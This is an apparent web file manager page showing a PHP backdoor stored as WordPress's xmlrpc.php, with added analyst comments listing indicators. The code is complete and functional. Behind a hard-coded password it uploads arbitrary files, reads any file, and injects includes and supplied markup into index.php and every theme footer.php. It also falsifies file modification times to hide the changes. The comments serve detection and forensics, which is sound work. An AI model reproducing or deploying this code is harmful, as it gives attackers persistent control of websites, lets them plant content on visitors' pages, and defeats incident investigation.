BossBey File Manager
PHP:
7.3.8
OS:
Linux
User:
web7
Root
/
var
/
www
/
clients
/
client9
/
web7
/
web
Editing: xmlrpc.php
<?php
/*
 * Analyst overview (defensive annotation; the code below is unchanged).
 *
 * This script is a password-gated remote file-management backdoor. The request
 * parameter `action` selects an operation and `password` must equal the
 * hard-coded $sysPwd. Operations visible here: upload a file to a chosen or
 * random directory, read a file, prepend an include to the site's index page,
 * overwrite the top of index.php with supplied content, and inject supplied
 * markup into every WordPress theme footer.php.
 *
 * NOTE(review): the page shows it stored as xmlrpc.php, presumably to blend in
 * with WordPress's own file of that name -- confirm against a clean install.
 *
 * Indicators a responder can hunt for, all taken from the code below:
 *   - every response, including errors, is wrapped in the literal `__success__`;
 *   - requests carrying `action=` and `password=` (any method, via $_REQUEST);
 *   - the hard-coded $sysPwd string inside PHP files;
 *   - marker comments `<!--cc-->` or `<!--...-->` at the top of index.php or
 *     just before `</body>` in theme footer.php files;
 *   - unexpected `backup.txt` and `aver.php` next to index.php;
 *   - modification times are deliberately falsified (see ModifyTime), so mtime
 *     must not be used to date the intrusion.
 */

// Hide all errors and remove the execution time limit.
error_reporting(0);
ini_set('display_errors', 0);
set_time_limit(0);
//header("Content-Type: text/html; charset=utf-8");

// Shared secret compared against the `password` request parameter.
$sysPwd="GQHK5W5ULV4H00TGO7D7";
$action = $_REQUEST['action'] ?? '';
$password = $_REQUEST['password'] ?? '';

// Both parameters are mandatory; failures still answer with the `__success__` wrapper.
if($action==""||$password=="") {
    die('__success__parameters error #1__success__');
}
if($password!=$sysPwd) {
    die('__success__parameters error #2__success__');
}

if($action=='uploadfix') {
    // Store the uploaded file at a caller-chosen path below the computed root.
    // `uploadpath` and `filename` come straight from the request, unvalidated.
    $uploadpath=$_REQUEST['uploadpath'];
    $filename=$_REQUEST['filename'];
    UploadFile($uploadpath,$filename);
} else if($action=='uploadrandom') {
    // Store the uploaded file in a randomly picked directory under the computed root.
    $filename=$_REQUEST['filename'];
    UploadFileRandom($filename);
} else if($action=='uploadrandomcur') {
    // Same, but the random directory is picked under this script's own directory.
    $filename=$_REQUEST['filename'];
    UploadFileRandomCur($filename);
} else if($action=='read') {
    // Return the content of a caller-named file relative to the computed root.
    // No path filtering is applied, so this discloses any file PHP can read.
    $filename=$_REQUEST['filename'];
    $rootPath=GetRootPath();
    $filePath=$rootPath.'/'.$filename;
    $filebody=file_get_contents($filePath);
    echo '__success__'.$filebody.'__success__';
} else if($action=='linkrobot') {
    // Prepend a PHP include of the caller-named file, followed by the marker
    // `<!--cc-->`, to the site's entry page.
    $filename=$_REQUEST['filename'];
    $fileflag='<!--cc-->';
    $fileplus="<?php include('".$filename."'); ?>".$fileflag;
    $rootPath=GetRootPath();
    // Target selection: index.php, else default.php, else home.php; if none
    // exists the path falls back to index.php, which is then created.
    $filePath=$rootPath.'/index.php';
    if(!file_exists($filePath)) {
        $filePath=$rootPath.'/default.php';
    }
    if(!file_exists($filePath)) {
        $filePath=$rootPath.'/home.php';
    }
    if(!file_exists($filePath)) {
        $filePath=$rootPath.'/index.php';
    }
    if(!file_exists($filePath)) {
        // No entry page at all: the new file contains only the include and marker.
        $filebody=$fileplus;
        $fp=fopen($filePath,"w");
        //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
        fwrite($fp,$filebody);
        fclose($fp);
    } else {
        $filebody=file_get_contents($filePath);
        // Already injected: keep only what follows the marker, i.e. drop the
        // previous include before adding it again.
        if(strpos('___'.$filebody,$fileplus)!==false) {
            $filebody=str_replace($fileflag,'~',$filebody);
            $arrParts=explode("~",$filebody);
            $filebody=$arrParts[1];
        }
        if(strpos('___'.$filebody,$fileplus)===false) {
            $filebody=$fileplus."\r\n".$filebody;
            $fp=fopen($filePath,"w");
            //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
            fwrite($fp,$filebody);
            fclose($fp);
        }
    }
    // Verify the injection is present, then falsify the file's mtime.
    if(file_exists($filePath)) {
        $filebody=file_get_contents($filePath);
        if(strpos('___'.$filebody,$fileplus)!==false) {
            ModifyTime($rootPath,$filePath);
            echo '__success__ok__success__';
        }
    }
} else if($action=='beindex') {
    // Put caller-supplied content at the top of index.php and drop two extra
    // files (backup.txt, aver.php) beside it.
    $aver='';
    $fileplus='';
    $checkstring='';
    // `aver` and `fileplus` arrive base64-encoded; `checkstring` becomes an
    // HTML comment used as the "already injected" marker.
    if(isset($_REQUEST['aver'])) {
        $aver=$_REQUEST['aver'];
        $aver=base64_decode($aver);
    }
    if(isset($_REQUEST['fileplus'])) {
        $fileplus=$_REQUEST['fileplus'];
        $fileplus=base64_decode($fileplus);
    }
    if(isset($_REQUEST['checkstring'])) {
        $checkstring=$_REQUEST['checkstring'];
        $checkstring='<!--'.$checkstring.'-->';
    }
    if($aver==""||$fileplus==""||$checkstring=="") {
        die('__success__parameters error #3__success__');
    }
    $rootPath=GetRootPath();
    $filePath=$rootPath.'/index.php';
    $filePath2=$rootPath.'/backup.txt';
    $filePath3=$rootPath.'/aver.php';
    if(!file_exists($filePath)) {
        die('__success__file-not-exist__success__');
    }
    // index.php is made world-writable before the rewrite; ModifyTime later
    // sets it to 0644.
    chmod($filePath,0777);
    $filebody=file_get_contents($filePath);
    // NOTE(review): $isdelete is not assigned anywhere in the visible code.
    if($isdelete=='1') {
        $filebody='';
    }
    // Already injected: keep only the text after the last marker.
    if(strpos('___'.$filebody,$checkstring)!==false) {
        $arrParts=explode($checkstring,$filebody);
        $filebody=$arrParts[count($arrParts)-1];
    }
    if(strpos('___'.$filebody,$checkstring)===false) {
        $filebody=$fileplus."\r\n".$checkstring.$filebody;
        // The same injected body is written to index.php and to backup.txt;
        // the decoded `aver` payload is written to aver.php.
        $fp=fopen($filePath,"w");
        //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
        fwrite($fp,$filebody);
        fclose($fp);
        $fp=fopen($filePath2,"w");
        //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
        fwrite($fp,$filebody);
        fclose($fp);
        $fp=fopen($filePath3,"w");
        //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
        fwrite($fp,$aver);
        fclose($fp);
    }
    // Report success only if the marker is now present in index.php.
    $filebody=file_get_contents($filePath);
    if(strpos('___'.$filebody,$checkstring)!==false) {
        ModifyTime($rootPath,$filePath);
        echo '__success__ok__success__';
        exit;
    } else {
        echo '__success__failed__success__';
        exit;
    }
} else if($action=='belink') {
    // Inject caller-supplied markup before the closing body tag of footer.php
    // in every directory directly under wp-content/themes.
    $fileplus='';
    $checkstring='';
    if(isset($_REQUEST['fileplus'])) {
        $fileplus=$_REQUEST['fileplus'];
        $fileplus=base64_decode($fileplus);
    }
    if(isset($_REQUEST['checkstring'])) {
        $checkstring=$_REQUEST['checkstring'];
        $checkstring='<!--'.$checkstring.'-->';
    }
    if($fileplus==""||$checkstring=="") {
        die('__success__parameters error #3__success__');
    }
    $rootPath=GetRootPath();
    if(!is_dir($rootPath.'/wp-content/themes')) {
        die('__success__folder themes not exist__success__');
    }
    $folders= GetFolders($rootPath.'/wp-content/themes',false);
    $arrParts=explode("|",$folders);
    // $result counts the footer.php files that end up carrying the marker.
    $result=0;
    for($n=0;$n<count($arrParts);$n++) {
        $fileFolder=$arrParts[$n];
        $filePath=$fileFolder.'/footer.php';
        if(!file_exists($filePath)) {
            continue;
        }
        chmod($filePath,0777);
        $filebody=file_get_contents($filePath);
        // Footers without a closing body tag are skipped.
        if(strpos('___'.$filebody,'</body>')===false) {
            continue;
        }
        // Already injected: cut the file at the marker and re-close the document.
        if(strpos('___'.$filebody,$checkstring)!==false) {
            $arrParts=explode($checkstring,$filebody);
            $filebody=$arrParts[0].'</body></html>';
        }
        if(strpos('___'.$filebody,$checkstring)===false) {
            $filebody=str_replace('</body>',$checkstring."\r\n".$fileplus.'</body>',$filebody);
            $fp=fopen($filePath,"w");
            //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
            fwrite($fp,$filebody);
            fclose($fp);
        }
        $filebody=file_get_contents($filePath);
        if(strpos('___'.$filebody,$checkstring)!==false) {
            ModifyTime($rootPath,$filePath);
            $result++;
        }
    }
    if($result>0) {
        echo '__success__ok-'.$result.'__success__';
        exit;
    } else {
        echo '__success__failed__success__';
        exit;
    }
}

/**
 * Moves the uploaded file (form field `upfile`) into a randomly chosen
 * directory one or two levels below the computed root, falsifies its mtime and
 * echoes the resulting URL wrapped in `__success__`.
 *
 * The chosen directory is made world-writable (0777) and is not restored here,
 * which is itself a findable artefact.
 *
 * @param string $filename Name to store the upload under (taken from the request).
 */
function UploadFileRandom($filename) {
    $hostUrl=is_https().$_SERVER['SERVER_NAME'];
    $rootPath=GetRootPath();
    $folders= GetFolders($rootPath,true);
    $arrParts=explode("|",$folders);
    $index=mt_rand(0,count($arrParts)-1);
    $fileFolder=$arrParts[$index];
    chmod($fileFolder,0777);
    $filePath=$fileFolder.'/'.$filename;
    move_uploaded_file($_FILES["upfile"]["tmp_name"],$filePath);
    if(file_exists($filePath)) {
        ModifyTime($fileFolder,$filePath);
        // Turn the filesystem path into a URL relative to the root.
        $fileUrl=$filePath;
        $fileUrl=str_replace($rootPath,'',$fileUrl);
        $fileUrl=str_replace('\\','/',$fileUrl);
        $fileUrl=str_replace('///','/',$fileUrl);
        $fileUrl=$hostUrl.'/'.$fileUrl;
        echo '__success__'.$fileUrl.'__success__';
    }
}

/**
 * Variant of UploadFileRandom that picks the random directory below this
 * script's own directory and builds the URL from the script's own URL path.
 *
 * @param string $filename Name to store the upload under (taken from the request).
 */
function UploadFileRandomCur($filename) {
    $hostUrl=GetLocationURLPath();
    $rootPath=realpath(dirname(__FILE__));
    $folders= GetFolders($rootPath,true);
    $arrParts=explode("|",$folders);
    $index=mt_rand(0,count($arrParts)-1);
    $fileFolder=$arrParts[$index];
    chmod($fileFolder,0777);
    $filePath=$fileFolder.'/'.$filename;
    move_uploaded_file($_FILES["upfile"]["tmp_name"],$filePath);
    if(file_exists($filePath)) {
        ModifyTime($fileFolder,$filePath);
        $fileUrl=$filePath;
        $fileUrl=str_replace($rootPath,'',$fileUrl);
        $fileUrl=str_replace('\\','/',$fileUrl);
        $fileUrl=str_replace('///','/',$fileUrl);
        $fileUrl=$hostUrl.'/'.$fileUrl;
        echo '__success__'.$fileUrl.'__success__';
    }
}

/**
 * Moves the uploaded file (form field `upfile`) to `$uploadpath/$filename`
 * below the computed root, creating the directory chain if needed, then
 * falsifies the mtime and echoes the resulting URL wrapped in `__success__`.
 *
 * An existing file at the target is made writable (0777) first, so this can
 * replace legitimate site files as well as add new ones.
 *
 * @param string $uploadpath Directory relative to the root; empty means the root itself.
 * @param string $filename   Name to store the upload under.
 */
function UploadFile($uploadpath,$filename) {
    $hostUrl=is_https().$_SERVER['SERVER_NAME'];
    $rootPath=GetRootPath();
    $fileFolder='';
    $filePath='';
    if($uploadpath!="") {
        $fileFolder=$rootPath.'/'.$uploadpath;
        $filePath=$fileFolder.'/'.$filename;
        createFolder($fileFolder);
    } else {
        $fileFolder=$rootPath;
        $filePath=$fileFolder.'/'.$filename;
    }
    if(file_exists($filePath)) {
        chmod($filePath,0777);
    } else {
        chmod($fileFolder,0777);
    }
    move_uploaded_file($_FILES["upfile"]["tmp_name"],$filePath);
    if(file_exists($filePath)) {
        ModifyTime($fileFolder,$filePath);
        $fileUrl=$filePath;
        $fileUrl=str_replace($rootPath,'',$fileUrl);
        $fileUrl=str_replace('\\','/',$fileUrl);
        $fileUrl=str_replace('///','/',$fileUrl);
        $fileUrl=$hostUrl.'/'.$fileUrl;
        echo '__success__'.$fileUrl.'__success__';
    }
}

/**
 * Falsifies the modification time of $filePath (timestomping) and leaves the
 * file with mode 0644.
 *
 * The new mtime is copied from a randomly chosen file in $dir, or, when no
 * other file is available, is a random timestamp between 2009-01-01 and
 * 2019-01-01.
 *
 * Forensic note: touch() and chmod() cannot set the inode change time, so
 * ctime still reflects when the file was really altered. A file whose ctime is
 * much later than its mtime is a useful lead on an affected host.
 *
 * @param string $dir      Directory to borrow a timestamp from.
 * @param string $filePath File whose mtime is rewritten.
 */
function ModifyTime($dir,$filePath) {
    chmod($filePath,0777);
    $randomFile= GetRandomFile($dir);
    if(!empty($randomFile)&&$randomFile!=$filePath) {
        $time=filemtime($randomFile);
    } else {
        $time=randomDate('2009-01-01','2019-01-01',false);
    }
    touch($filePath,$time);
    chmod($filePath,0644);
}

/**
 * Returns a random moment between two dates.
 *
 * @param string $begintime Lower bound, parsed with strtotime().
 * @param string $endtime   Upper bound; empty means mktime() with no arguments.
 * @param bool   $now       True returns a "Y-m-d H:i:s" string, false the Unix timestamp.
 */
function randomDate($begintime, $endtime="", $now = true) {
    $begin = strtotime($begintime);
    $end = $endtime == "" ? mktime() : strtotime($endtime);
    $timestamp = rand($begin, $end);
    return $now ? date("Y-m-d H:i:s", $timestamp) : $timestamp;
}

/**
 * Computes the directory treated as the site root.
 *
 * The request URL (scheme + HTTP_HOST + PHP_SELF) is split on "/" and the
 * function climbs (number of parts - 4) levels above this file's directory.
 * For a script requested directly under the host name that is zero levels,
 * i.e. the script's own directory. The result comes from realpath().
 */
function GetRootPath() {
    $returnVal='';
    $locationUrl=GetLocationURL();
    $arrParts=explode("/",$locationUrl);
    $prevUrl='';
    for($n=0;$n<count($arrParts)-4;$n++) {
        if($n==0) {
            $prevUrl.= '/../';
        } else {
            $prevUrl.= '../';
        }
    }
    $returnVal=realpath(dirname(__FILE__).$prevUrl);
    return $returnVal;
}

/**
 * Returns the URL of the running script, built from the request-supplied
 * HTTP_HOST header and PHP_SELF.
 */
function GetLocationURL() {
    return is_https().$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
}

/**
 * Returns the URL of the running script with the final path segment removed
 * (the result ends with "/").
 */
function GetLocationURLPath() {
    $pageURL = is_https().$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
    $arrParts=explode("/",$pageURL);
    $pageURL='';
    for($n=0;$n<count($arrParts)-1;$n++) {
        $pageURL.= $arrParts[$n].'/';
    }
    return $pageURL;
}

/**
 * Lists the sub-directories of $dir as one string, each path followed by "|".
 *
 * @param string $dir    Directory to scan.
 * @param bool   $is_sub When true, the sub-directories of each entry are listed
 *                       as well (one extra level: the nested call passes false).
 */
function GetFolders($dir,$is_sub) {
    $returnVal='';
    $files = array();
    $dir_list = scandir($dir);
    foreach($dir_list as $file) {
        if($file=='..' || $file=='.') continue;
        if(!is_dir($dir.'/'.$file)) continue;
        $returnVal.=$dir.'/'.$file.'|';
        if($is_sub) {
            $returnVal.=GetFolders($dir.'/'.$file,false);
        }
    }
    return $returnVal;
}

/**
 * Lists the non-directory entries of $dir as one string, each path followed by "|".
 *
 * @param string $dir Directory to scan.
 */
function GetFiles($dir) {
    $returnVal='';
    $files = array();
    $dir_list = scandir($dir);
    foreach($dir_list as $file) {
        if($file=='..' || $file=='.') continue;
        if(is_dir($dir.'/'.$file)) continue;
        if($dir.'/'.$file=='') continue;
        $returnVal.=$dir.'/'.$file.'|';
    }
    return $returnVal;
}

/**
 * Picks one entry at random from GetFiles($dir).
 *
 * Because the list ends with "|", the split yields a trailing empty element, so
 * the result can be an empty string; ModifyTime checks for that with empty().
 *
 * @param string $dir Directory to pick from.
 */
function GetRandomFile($dir) {
    $files=GetFiles($dir);
    $arrParts=explode("|",$files);
    $index=mt_rand(0,count($arrParts)-1);
    $filePath=$arrParts[$index];
    return $filePath;
}

/**
 * Creates $path and any missing parent directories, each with mode 0777.
 * Called by UploadFile.
 *
 * @param string $path Directory to create.
 */
function createFolder($path) {
    if (!file_exists($path)) {
        createFolder(dirname($path));
        mkdir($path, 0777);
    }
}

/**
 * Recursive directory creation that reports success as a boolean.
 * Not called by the dispatcher in this file.
 *
 * @param string $dir Directory to create.
 */
function mkdirs($dir) {
    if(!is_dir($dir)) {
        if(!mkdirs(dirname($dir))) {
            return false;
        }
        if(!mkdir($dir,0777)) {
            return false;
        }
    }
    return true;
}

/**
 * Recursively deletes $dir and everything below it.
 * Not called by the dispatcher in this file.
 *
 * @param string $dir Directory to delete.
 */
function rmdirs($dir) {
    $d = dir($dir);
    while (false !== ($child = $d->read())) {
        if($child != '.' && $child != '..') {
            if(is_dir($dir.'/'.$child)) rmdirs($dir.'/'.$child);
            else unlink($dir.'/'.$child);
        }
    }
    $d->close();
    rmdir($dir);
}

/**
 * Returns 'https://' or 'http://' for the current request, based on
 * $_SERVER['HTTPS'] and on the request headers X-Forwarded-Proto and
 * Front-End-Https.
 */
function is_https() {
    if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
        return 'https://';
    } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
        return 'https://';
    } elseif (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
        return 'https://';
    }
    return 'http://';
}

/**
 * Fetches $url and returns the response body as a string.
 * Not called by the dispatcher in this file.
 *
 * Uses cURL when available (certificate verification disabled, redirects
 * followed, a fixed MSIE 6.0 User-Agent), otherwise file_get_contents(), and
 * as a last resort a hand-built HTTP/1.1 GET over a socket to port 80. The
 * fixed User-Agent string is a possible egress-log indicator.
 *
 * @param string $url Address to fetch.
 */
function GetHttpPage($url) {
    $output = '';
    $time_out = 30;
    if (function_exists ( 'curl_init' )) {
        $ch = curl_init ();
        curl_setopt($ch, CURLOPT_URL, $url );
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true );
        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true );
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $time_out );
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
        curl_setopt($ch, CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
        $output = curl_exec($ch );
        curl_close ($ch);
    } elseif (function_exists ( 'file_get_contents' )) {
        $context = stream_context_create(array('http' => array('timeout' => $time_out)));
        $output = file_get_contents ( $url, false, $context);
    } elseif (ini_get ( "allow_url_fopen" ) == "1") {
        $errstr = '';
        $errno = '';
        $info = parse_url ( $url );
        $fp = fsockopen ( $info ["host"], 80, $errno, $errstr, $time_out ) or exit ( $errstr . "--->" . $errno );
        $head = "GET " . $info ['path'] . "?" . $info ["query"] . " HTTP/1.1\r\n";
        $head .= "Host: " . $info ['host'] . "\r\n";
        $head .= "Connection: Close\r\n\r\n";
        fwrite($fp, $head);
        while ( ! feof ( $fp ) ) {
            $output .= fgets ( $fp, 128 );
        }
        fclose ( $fp );
    }
    return $output;
}
?>